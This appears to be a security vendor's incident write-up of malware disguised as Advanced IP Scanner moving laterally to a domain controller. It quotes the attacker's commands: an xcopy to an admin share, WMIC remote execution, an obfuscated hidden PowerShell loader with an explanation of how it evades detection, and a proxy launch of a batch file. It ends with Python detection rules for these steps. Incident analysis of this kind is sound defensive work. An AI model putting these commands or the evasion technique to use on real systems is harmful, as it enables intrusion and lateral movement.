On November 20, 2023, Blumira produced three findings that led to a security incident investigation into remote code execution on two separate XYZ Company hosts. The initial workstation, {hostname1}, downloaded a malicious executable masquerading as “Advanced IP Scanner.” That file then ran automated batch script commands and copied its payload over to the server {DomainController2}. The malicious application also began setting up a command and control session with an IP address hosted at Cloudflare.
Note: All IP addresses, hostnames, and usernames have been changed to protect customer data.
Time: 18:57 UTC
Mitre Tactic & Technique: Discovery, T1018 – Remote System Discovery
Activity #1: TOMSMITH mistakenly downloaded malicious software on hostname1. The software was advertised as Advanced IP Scanner in Google search results, and the result led the user to a fake version of the tool hosted in a Cloudflare instance. The logs also show the installation of this program onto hostname1. Important artifacts created around this time are:
C:\ProgramData\Microsoft\NodejsToolsVsix\CG6oDkyFHl3R.t
C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t
Time: 18:59 UTC
Activity #2: A Blumira finding for Advanced IP Scanner was generated. Although this was not the legitimate version of Advanced IP Scanner, there is still value in detecting early-stage reconnaissance tooling, because correlated activity of this kind can be an early warning sign of an attack.
Time: 19:06 UTC
Mitre Tactic & Technique: Discovery, T1016 – System Network Configuration Discovery
Activity #3: Running under the Administrator account on hostname1, the attacker executes several commands to gather information about the AD domain:
"C:\WINDOWS\system32\nslookup.exe" internaldomain.local
"C:\WINDOWS\system32\systeminfo.exe"
Time: 19:06 UTC
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #4: When Advanced_IP_Scanner_2.5.4594.1.exe is run, we can see living-off-the-land binaries (LOLBAS) in action. The two commands that follow immediately show a .NET binary being built at runtime rather than dropped to disk pre-compiled: vbc.exe compiles source from a response file (the .cmdline file in the user's Temp directory), and cvtres.exe converts the compiled resource file into an object for linking.
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\TOMSMITH\AppData\Local\Temp\RESA392.tmp" "C:\Users\TOMSMITH\AppData\Local\Temp\vbcEF74F3B3EC042EBBFF08FC71F3636EB.TMP"
Time: 19:07 UTC
Mitre Tactic & Technique: Collection, T1074.002 – Data Staged: Remote Data Staging
Activity #5: Under the Administrator account, the attacker runs the command below to copy the staged LogConverter directory, which holds the malicious batch file and the .t payload, to the C$ administrative share of the newly discovered domain controller. The switches matter for the analyst: /E copies the whole directory tree including empty subdirectories, /H includes hidden and system files, and /Y suppresses overwrite prompts so the copy completes unattended.
"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y
Time: 19:08 UTC
Mitre Tactic & Technique: Execution, T1047 – Windows Management Instrumentation
Activity #6: From hostname1, the attacker uses WMI remote process creation (wmic /node:<target> process call create) to run the newly copied code on the domain controller. Note that the launched object is a .lnk shortcut rather than the executable itself.
"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create "cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"
Time: 19:08 UTC
Activity #7: A Blumira finding for WMI Remote Code Execution was generated for the previous command.
Time: 19:09 UTC on DomainController2
Mitre Tactic & Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #8: With a remote execution channel into the domain controller, the attacker was able to run commands on the DomainController2 host. DomainController2 then runs the following PowerShell script:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden -command "Set-Item Variable:LeX 'Net.WebClient';Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t';ls _-*;SI Variable:TL (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name).Invoke('N*-O*')(GV LeX -Valu));Set-Item Variable:\h ((((Get-Variable TL).Value|GM)|Where-Object{$_.Name-clike'*wn*g'}).Name);$ExecutionContext.(($ExecutionContext|GM)[6].Name)|ForEach-Object{(Get-Variable _).Value.(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'In*'}).Name).Invoke((Get-Variable TL).Value.((Get-ChildItem Variable:/h).Value).Invoke((Variable 8i -ValueOnl)))}"
To break this down a little:
1. This part runs PowerShell with a hidden window, a tactic malicious scripts commonly use to hide their activity from the user. The sysnative path is the redirect a 32-bit process uses to reach the 64-bit PowerShell, so the launcher here is a 32-bit process:
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden
2. This creates a new variable named LeX and sets it to the string Net.WebClient, the name of the .NET class used for making web requests (only the name is stored here; the object is constructed later).
Set-Item Variable:LeX 'Net.WebClient'
3. This sets another variable, 8i (addressed through the Variable: provider path Variable:/8i), to the path of the dropped .t file.
Set-Item Variable:/8i 'C:\ProgramData\Microsoft\LogConverter\CG6oDkyFHl3R.t'
4. This is a Get-ChildItem call for items whose names match _-*. It most likely matches nothing and is filler inserted to break signature-based matching.
ls _-*
5. The rest of the script never spells out a suspicious cmdlet or method name. It picks members by position or by wildcard instead: ($ExecutionContext|GM)[6] is the InvokeCommand property (the seventh member Get-Member lists); the member of InvokeCommand matching *ets is GetCmdlets, which is asked for the cmdlet matching N*-O*, that is New-Object, and that cmdlet is invoked with the LeX value to construct a Net.WebClient object stored in TL. The WebClient member matching *wn*g is DownloadString, whose name is stored in h. Finally, the InvokeCommand member matching In* is InvokeScript, which is called with the result of DownloadString on the 8i path. WebClient.DownloadString accepts a local file path, so the net effect is to read the dropped CG6oDkyFHl3R.t file and execute its contents as PowerShell, while the strings Invoke-Expression, IEX, DownloadString and InvokeScript never appear in the command line. Detections keyed on those literal strings would miss this; the indexed Get-Member access and the -clike wildcard member lookups are themselves the tell.
Time: 19:10 UTC
Mitre Technique: Execution, T1059 – Command and Scripting Interpreter
Activity #9: We then see a batch script launched from that same directory. Microsoft.NodejsTools.PressAnyKey.exe is a signed Microsoft helper shipped with the Node.js Tools for Visual Studio; it runs the command passed on its command line and then waits for a key press, and here it is used as a proxy to start cmd /c LogConverter.bat.
"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat
Time: 19:10 UTC
Activity #10: A Blumira finding for Batch Script Execution was generated. We do not alert on every batch script execution, just as we do not alert on every program being run. What made this one stand out is that the command line was first invoked remotely, from an unusual location, to run the batch script.
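Every step from Activity #3 to Activity #9 is an ordinary process-creation event, which is why command-line logging (Sysmon Event ID 1 or the Blumira Agent) is what made the chain visible. As an added example, not part of the original Blumira write-up, the Python below runs a handful of rules over constructed Sysmon-style records built from the command lines quoted above (the hostnames and the 19.1.44.11 address are the post's own placeholders, and a benign run of the real tool is included as a control), and then correlates the xcopy to an admin share with the later WMI process creation aimed at the same host. The rule names, field names and thresholds are my assumptions, not Blumira's detection logic.

```python
"""Added example: detection rules over Sysmon-style process-creation records.

SAMPLE_EVENTS is constructed from the command lines quoted in the timeline; it is
not real telemetry. Field names follow Sysmon Event ID 1 (Computer, User, Image,
CommandLine). Rule names and thresholds are the example author's own choices.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [
    {"Computer": "hostname1", "User": "XYZ\\Administrator",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig '
                    r'@"C:\Users\TOMSMITH\AppData\Local\Temp\twerdmug.cmdline"'},
    {"Computer": "hostname1", "User": "XYZ\\Administrator",
     "Image": r"C:\WINDOWS\system32\xcopy.exe",
     "CommandLine": r'"C:\WINDOWS\system32\xcopy.exe" c:\programdata\microsoft\LogConverter '
                    r'\\19.1.44.11\C$\programdata\microsoft\LogConverter /E /H /Y'},
    {"Computer": "hostname1", "User": "XYZ\\Administrator",
     "Image": r"C:\WINDOWS\System32\Wbem\WMIC.exe",
     "CommandLine": r'"C:\WINDOWS\System32\Wbem\WMIC.exe" /node:19.1.44.11 process call create '
                    r'"cmd.exe /c C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk"'},
    {"Computer": "DomainController2", "User": "XYZ\\Administrator",
     "Image": r"C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe -windowstyle Hidden '''
                    r'''-command "Set-Item Variable:LeX 'Net.WebClient';SI Variable:TL (.$ExecutionContext.'''
                    r'''(($ExecutionContext|GM)[6].Name)|GM|Where-Object{$_.Name-clike'*ets'}).Name)"'''},
    {"Computer": "DomainController2", "User": "XYZ\\Administrator",
     "Image": r"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe",
     "CommandLine": r'"C:\ProgramData\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.exe" abnormal '
                    r'c:\programdata\Administrator cmd /c C:\ProgramData\Microsoft\LogConverter\LogConverter.bat'},
    # Benign control: the real tool run from its normal install location must stay quiet.
    {"Computer": "hostname1", "User": "XYZ\\tomsmith",
     "Image": r"C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe",
     "CommandLine": r'"C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe"'},
]

TEMP_RESPONSE_FILE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
ADMIN_SHARE = re.compile(r"\\\\([^\\\s]+)\\[a-z]\$\\", re.I)          # \\host\C$\...
WMIC_NODE = re.compile(r'/node:"?([^\s"]+)', re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
SCRIPT_IN_PROGRAMDATA = re.compile(r"\\programdata\\.*\.(bat|cmd|lnk|ps1)\b", re.I)
# Tokens characteristic of index/wildcard member resolution instead of plain cmdlet names.
OBFUSCATION_MARKERS = ("|GM)[", "Variable:", "$ExecutionContext", "-clike")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def compiler_from_user_temp(e: Event) -> bool:
    # .NET compilers driven by a script read their response file from %TEMP% (Activity #4).
    return basename(e["Image"]) in {"vbc.exe", "csc.exe", "cvtres.exe"} \
        and TEMP_RESPONSE_FILE.search(e["CommandLine"]) is not None


def copy_to_admin_share(e: Event) -> bool:
    # Staging files on another host's C$/ADMIN$ share (Activity #5).
    return basename(e["Image"]) in {"xcopy.exe", "robocopy.exe", "cmd.exe"} \
        and ADMIN_SHARE.search(e["CommandLine"]) is not None


def wmi_remote_process_create(e: Event) -> bool:
    # wmic /node:<host> process call create ... (Activity #6).
    cl = e["CommandLine"].lower()
    return basename(e["Image"]) == "wmic.exe" and "/node:" in cl and "process call create" in cl


def hidden_obfuscated_powershell(e: Event) -> bool:
    # Hidden window plus at least two obfuscation markers (Activity #8).
    cl = e["CommandLine"]
    return "powershell" in basename(e["Image"]) and HIDDEN_WINDOW.search(cl) is not None \
        and sum(marker in cl for marker in OBFUSCATION_MARKERS) >= 2


def programdata_script_via_proxy(e: Event) -> bool:
    # A signed helper or cmd.exe launching a script dropped under ProgramData (Activity #9).
    return basename(e["Image"]) in {"microsoft.nodejstools.pressanykey.exe", "cmd.exe"} \
        and SCRIPT_IN_PROGRAMDATA.search(e["CommandLine"]) is not None


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("compiler_from_user_temp", compiler_from_user_temp),
    ("copy_to_admin_share", copy_to_admin_share),
    ("wmi_remote_process_create", wmi_remote_process_create),
    ("hidden_obfuscated_powershell", hidden_obfuscated_powershell),
    ("programdata_script_via_proxy", programdata_script_via_proxy),
]


def run_detections(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (rule, computer, image basename) for every rule each event trips, in event order."""
    return [(name, e["Computer"], basename(e["Image"]))
            for e in events for name, pred in RULES if pred(e)]


def correlate_staging_and_wmi(events: List[Event]) -> List[Tuple[str, str]]:
    """Pair an admin-share copy with a later WMI process create from the same source to the same host."""
    staged = set()
    hits = []
    for e in events:  # events are assumed to be in chronological order
        if copy_to_admin_share(e):
            staged.add((e["Computer"], ADMIN_SHARE.search(e["CommandLine"]).group(1).lower()))
        elif wmi_remote_process_create(e):
            m = WMIC_NODE.search(e["CommandLine"])
            if m and (e["Computer"], m.group(1).lower()) in staged:
                hits.append((e["Computer"], m.group(1)))
    return hits


if __name__ == "__main__":
    for rule, host, image in run_detections(SAMPLE_EVENTS):
        print(f"{host:18} {image:45} {rule}")
    for src, dst in correlate_staging_and_wmi(SAMPLE_EVENTS):
        print(f"lateral movement: {src} staged files on \\\\{dst}\\C$ and then executed them via WMI")
```

Run stand-alone, the script prints one line per rule hit (five in total, none for the benign control) followed by the correlated hostname1 to 19.1.44.11 lateral-movement pair. The correlation is the piece worth keeping: either event alone is something an administrator might do, but the same source copying to a host's admin share and then spawning a process on it through WMI within the same window is the pattern this incident shows.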
We were also given copies of both CG6oDkyFHl3R.t and LogConverter.bat by the customer. The .t file was a C# application; its key functionality breaks down as follows:
An attacker designed this obfuscated program for remote control and data exfiltration. The program hides its console window, communicates with a server over HTTPS, and can execute PowerShell commands on the local machine, sending the encrypted results back to the server.
Time: 22:16 UTC
Activity #11: The same software masquerading as Advanced IP Scanner was observed on DomainController2, and we updated the previously created finding with the new information.
Time: 22:53 UTC
Activity #12: Customer contacts our support team.
Time: 23:37 UTC
Activity #13: Support team begins investigation.
Time: 01:54 UTC
Activity #14: The customer manually isolates the hosts using Blumira Agent.
Time: 14:13 UTC
Activity #15: After consulting with the customer and confirming this was an attack and not something expected, a member of the Blumira team starts the process of submitting a report for the malicious Cloudflare instance via Cloudflare’s abuse page.
Time: 15:27 UTC
Activity #16: Two files were found on hostname3, which had received them through an automated backup of the Administrator profile. SentinelOne took action and blocked LogConverter.bat from executing there.
For this specific incident, the Blumira team has several defensive recommendations.
There is no unhackable company, software, hardware, or person. I recently had a discussion on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything; it's just not possible. What is possible is the ability for us to grow and learn over time, and to accept that this is something we should constantly be doing. So what could we have done better in this situation?
These detections depend on process command-line telemetry, which either the Blumira Agent or Sysmon provides; in this case the admin was also able to quickly identify and quarantine the hosts with the Blumira Agent. Thanks to the quick actions of both teams, there was no downtime and no further remediation was needed.
As this incident demonstrates, early detection and proactive security measures are crucial in preventing threat actors from establishing footholds in your environment. If you're looking for other ways to improve your security posture, consider the free Blumira Domain Security Assessment. This new tool provides a comprehensive view of your publicly accessible assets and potential security gaps in minutes, no strings attached. Request your free assessment here.